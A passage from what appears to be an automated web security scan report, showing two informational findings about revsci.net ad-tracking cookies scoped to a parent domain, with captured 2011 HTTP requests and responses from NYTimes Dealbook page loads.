xywUPcQMMBqQPokkLOCdoNsQ4sU8wXDnm6sQTaPPZYU7xhV84BsqqNd4sw6PPEblBfop16oBeTlEDYr4I+5vjI6SJq9B+4ex4KLABvrR1I3XSKHPCHzW+edhsiTVkENFbUGdPxJ5PIajmY4N/uNALp+PtABTXhv/qBvdvlF/PgMYLtRX7w2VPJUb3lAY2m3TQPBIhaFN7wj2Cd3qLge5SlG0QqWlm5k1TNMYB37fQyPEr+ykPVkesKPa8MGpMvLF0i80dprDp5LIIgDblp8NYxItWiihsCOgRnjGvsl6yXHcw93FKMGq/QUWnQcLAuWAmp5TSa/VSu/65JJqobDolPkwc1sh2OwiIaGUdhjuJDSwB6t+8iN/wKcdYJxNknyMfkFp09wMyEsrb+MWEOymzDAZYkmrrXzhYgMEtf+5JmuSI6kx1bHRNDWZxIQ7KbXVF/gshYn7HGJewR9hhLhOFlhj8BncLYuHq7ll+PmcOA; udm_0=MLvv9CEJZjpv597JwPKJxL5jdQTtJkLnfaGGH+sXeVhojk3TDdGQ48R7+bLruJ60iM7Sz5oU/MMtfVAK48Z9O6/45hHhobh/P4HBsmPoU0h5SlodRsokYWrKBhXeWhEMhpYHEPoL0KzP3EX6mZFBv9S2dirOe+Qyy4gATViu1piG4YZ7h8IYuIBweBMVCqaoaapFLQFyXwt86CZwNS/ZI2FWdSU9tZKJgdmJaVdwKcPVH+omeRzslVmcpIreii62y4609e4ruTWt7AE2biclRlljz/XkBWKA5jAg4YmqVGcKbaF6Cu6lYgxzS61ATCc+TsSYHbQaQ1b9Bs+h1g+JnvqhPRhpQ9X0T4UILyoAQ6qaTcW0y75ATMgFgVPblB4OEOs+Rn07APBf2ZHZpTJZjCRQRFadCPUUZff9Ww751+pCXbMqzxH3RYaKszrGmw6Bl4Ct/tulPpzHRX4tck+fTAi/ALopOv5wo121Ej5NzCSn35BLQTnG8v/Hkb5rho3dE4bfKB0F8OojW/LLW25gMvqy8pCPUDiUjjwIVd2JfYKiCMGfqd4xuDm3SoXlXWi3Dlgd95+TvfwAHEbVpqzZ2dJOiGbI53uuikyLW71k0ngzB8AZvzytlxan3LWtI9KLsDEIHcprGI0mdY9SUpHT5bxx++8lE5XeRgy9PKl9oYPzV18TxOcagKS3NSOdNBPwaVlx86cak5s8ds1TjvFzExJ467/tlD1ty+ys++umu5ueP6HM12z2u8KSGE9dfflBj7aCHSyO4HcghXXbNjSygKXMBMX0o5gvyaduUNMSFm1YsynfDZLjWdWG6z8xfF9KvtuoIvfyR8ivzFlHL9O/BlcJpaAUdmqA4/keMlEDeuVWtb5stFbBI5DkQgFHhtP2M+g3pxqzPHlouWGOpx2YtocD29it3JFGBItEFfDxTvrDHQvroo0ida71OC1NcxQC9OQy/XOqEJSX8RxfPeouAjoyMqhm9iYIDCK9zu/9sqzwwrgQyOWvphqvVlaowQsS7wrMADeCqdUu6+NVgO9o9XKjPMGkhgPuPIa/yihqHah+SKlO/XvClQX5MMYfZ7FRKgw6q/CP1dHLbkstqhnDmd5GVppLaNZ8l96XbeFJYXTEUzZ7A05Gh0cWCt8hXDSQ6tG2T4FA6XpVxk9n7+CCGxEPjIBFxv6Zxo5lwBeBFo7a4W2T7sLx6MvsoljB9f4Ar+LT5IKhnteI1KOCoUTmoniPnKp7BUuAMUbZ71SX7LSYEEFII4BVWgijlPQbImy3ASlt5J6Guc//o0z9oaUJT/Uh5seuNBfBl06kSXLHwN/KiYSeCNpTNy0V8sIsafkXxKnd3DSC5+SZuwyeo8wN2ZOuOHPrI62KZ7vjIfFSAYKp+cwFzUbH+KvmJ2e7kzJTI1DnL8JUMCe/MMrjdE/2Iyf6TJWMi7AnjiVPx/vbvRAW4RDo3AKJE999kwYcaRciNrO/ANzPdafxGI8WPRFgVCDLgX1vPcai

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_TX1Q=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4j+huHIMHvC1v6FY5BAFiE2lu64fVY6/Tm+YLTQmufPZ01rc6vdg2v/oPlIcMX/OvdTE/uq6JB33VvBVw0bvGRPtPVF+v31Di+ws9t2aJi6fJfcYPOegZxQVZYR2KOkQqCbRlwQpf87la8qMva2fdzFQ0Rjo4nVnPf51DBQFzH8NDiVhMKNJfwEt1TQbc0vhwojK+4qaN2+/+HnGmsjpufR5knvKQ8N//2J3I/z/74Fa0h7TEN0cV4UW2ewjF12bJ/yIk67vBSwjKBtCVtSnBPdqT1qu883AOe0/82dCdGlIU/ssRDzOF7worKDEPkB4qT+ibUaClOlYPsIrC3MEcG2omGwvO5NgVAjNTNuSN58+l4tQTtPevwht31nvuqfXdgXWTuaXrXb1gXp1KTPtf7kb9UYzupdyf5PX0IkVznHvumJnRYiWH+nYii7438v9NbzKztvTTKaZfeCphtHUw7gnP/uNalPDQCz6vEcinpDTJr/HSESuGASxo7VdJ4qIj/oD8XuAK4TuCotbm/W/AovIHMJ5LD9Y/KYGPxsCPABSHpul6yzR9OAoNE8CsWbwoY76Fu2Z9q2aeQWqJN5VERwz6NAC3n4CZDyL1irUCYY+ZAHAiw7x2UhXmxSNo+ZrIbKJfUn8WDqKhYpr/lcG5TPKc0KmVcV8AoTfKiiUmZ5s8xWGNeTqs8WNiDI0CQHiUZtow78bGv8yAtv0vMAiLlB+b0aOEsxN4b9NFMR7Oi/Iufbc1FfizZQYxVJ5mYmbsBdDeOjWyy9wMy/g8ZjrVJ7rHZnfzJWYx84+SAgnbh/fcyRq; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:18 GMT; Path=/
Set-Cookie: rtc_4K_j=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:18 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:17 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

13.63. http://pix04.revsci.net/H07707/b3/0/3/0806180/513736918.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/513736918.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFOcPC7nMQVv0bea4zXdqaN00wXH9OwgTAQapo1TU0ubO+NPBo4EXogx1f8njWmBHnqWfgLfri7RfBvzJVf7SyFDaR0MlGrKGTiaYJPamDzK30EAT/SI126MtmimUuvg/k+PioAHg+J+FH9aWWWPcaDCerAS40UiAbyIU8lpYp6sc3is99Ym7hKs946X4C6xZvJ/hnt7zarqcdNGab9as5vCNbT8VG0DCe+/XysCwh/pOGz5TYyg==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:27:47 GMT; Path=/
rtc_bwZ4=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E3r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCF5Z/4S; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:27:47 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/513736918.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fventure-capital%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F12%252Ftakeda-in-talks-to-buy-nycomed-for-up-to-14-billion%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/venture-capital/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=MLvv7qPvYS5npS5IdtJQSJvhPx/j4C3JXuteOzZrowSCWmqpgTbMk8TbSMyqxlmLyxECNpR02+gPiezqOi+5yDykHuJcd6JJdoqLT8+i34bQnPvlwJigh1mUBVMxT2jfIxNwiDsUjsIFhNY13veukem47waFuIaQqYRyamjEvbzrtYAFMkMLhz8IyAfDJDgGAxRmbCiIOI/di7VuccpOkCFmEfIjhk5PRY/BVcGMxjjd26Gh4r3LbiC/DDBiBEkhq8JEqKIFkLwkhRrrOal9LlyDJN56E1oZkKstcU4ls+6wuVbuB+4+40PT0qOQ8ovh6fTDhw1dZ5SWaGL6x6vGDshNHJvL1UajC5eKoBIJ2xSFpyDcj4+w77js62NAT7kEPYmvqQoshwPyf2vOCimLsUgUFNNxIGmZPYzZs4PiPM+vVu1dcss0McJQrn3DO1uknbOYHQiwl9wlvyRQm0rbkjW9LIrwSiZCNdEo0ad0FuCYBgpXiDG66lxpMUq0lKVhL3YyhyI/Oj+MuDOYFK+dW/6zM7b1mda0br2f4dGKPL3vg4qXPKYWMdCSKP0Xg355P74y; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPNOkPF7gMUFq3R0NZJg79Yas1wQQBbbXSBXm54UoIg8jZQmRgO/0Iny1pmOVO4twqF+wHN3TSjXx8300qePNJ5roo9DbO9WklOtTIsXCYB/8h4D9v+3oIbfS+2MGelkxH+zcSjFgFrky+dcCdmBamiMyQ+LMGXujCnvV4wnM7ZTba/eheTvgvP57JkOj1KgvZGifP9WSlmXa/V8uXC5G3uMw==; rtc_rbW-=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Enr//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCAvGf4n

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_rbW-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOcPC7nMQVv0bea4zXdqaN00wXH9OwgTAQapo1TU0ubO+NPBo4EXogx1f8njWmBHnqWfgLfri7RfBvzJVf7SyFDaR0MlGrKGTiaYJPamDzK30EAT/SI126MtmimUuvg/k+PioAHg+J+FH9aWWWPcaDCerAS40UiAbyIU8lpYp6sc3is99Ym7hKs946X4C6xZvJ/hnt7zarqcdNGab9as5vCNbT8VG0DCe+/XysCwh/pOGz5TYyg==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:27:47 GMT; Path=/
Set-Cookie: rtc_bwZ4=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E3r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCF5Z/4S; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:27:47 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:27:47 GMT
Content-Length: 1029

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_10872','H07707_11017','H07707_11018','H07707_10678','H07707_11020','H07707_11028','H07707_11029','
...[SNIP]...

13.64. http://pix04.revsci.net/H07707/b3/0/3/0806180/551354059.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/551354059.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4k+huAIMDjaxs0YFwqim7poa4ScLEaYNkX2Il9r5vw/ZUtic6udg2v9kDss6IjO5o23BoCO6Yh1pQKbTEaLZs6jeydgaN1bDMvXJfMmrtjdgi/lh4+qjESwdtMDZ2Xg0iKYNtxVTf87l8tTQ5a2fdzBO01hpasaFs3zi4R/U2Y6bnTHOuev6dgjYSCSM5L5W8uISkMwVh/e8mTsl8XrcZBWNDdNhtQGHvcGTyrrJkAMYg6KpNJ8v5Ojd3ERdmLUGU0MhvzKOTCurdC9RTFdx6PRHh0LMAWqUPpQHjrd1hgjmhDDF9RLeyr60VS3aEiwyLkzlYGpBmYxaEGS15vaTnZ1XjLYqJLJYkWoF+kgYmzO68/pLe3JGQYRfgkwN+8hyka274XX+Pm9wsaKdn86RlJ4qwCQnlaFkCz8WhLQ87qJvZikXZpFzdiYv8/zEDK36HH7mRptsgN2HjsyP+KkSXatbukqVnBpqpIVvgoVhr68hpmGnxQjcr7bR+OVBnJwnaPbjbooCYVI+l+7PE6ZDI5ai7bnH8H/VsHevO7O5jHl7RKCPE4FbwD0i3Og2jlmw+FR62d/wdRRzaECgxrjJglhapYso4GUwCxc8pvB7daMsxOs+uUXiODhQmpIfG9OubRDXn0Oqb0NAWbqvs9vHvWam/q9hJN8mVaAIy/9lNcAdFfYK64LDsCneGrzcy22+iKY/O6/RQN0a/sA6JAIm9cKhxJ8UAP2JG1gF4ps9a3yMhz/RLM23iuhvT6cwM7kJO//obZav4KW1tKbteMmIdcnaCj0GgKI6vg5++TYOKX8=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:29 GMT; Path=/
rtc_uvoL=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:29 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/551354059.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F03%252Fforstmann-is-said-to-be-undergoing-treatment-for-brain-cancer%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; 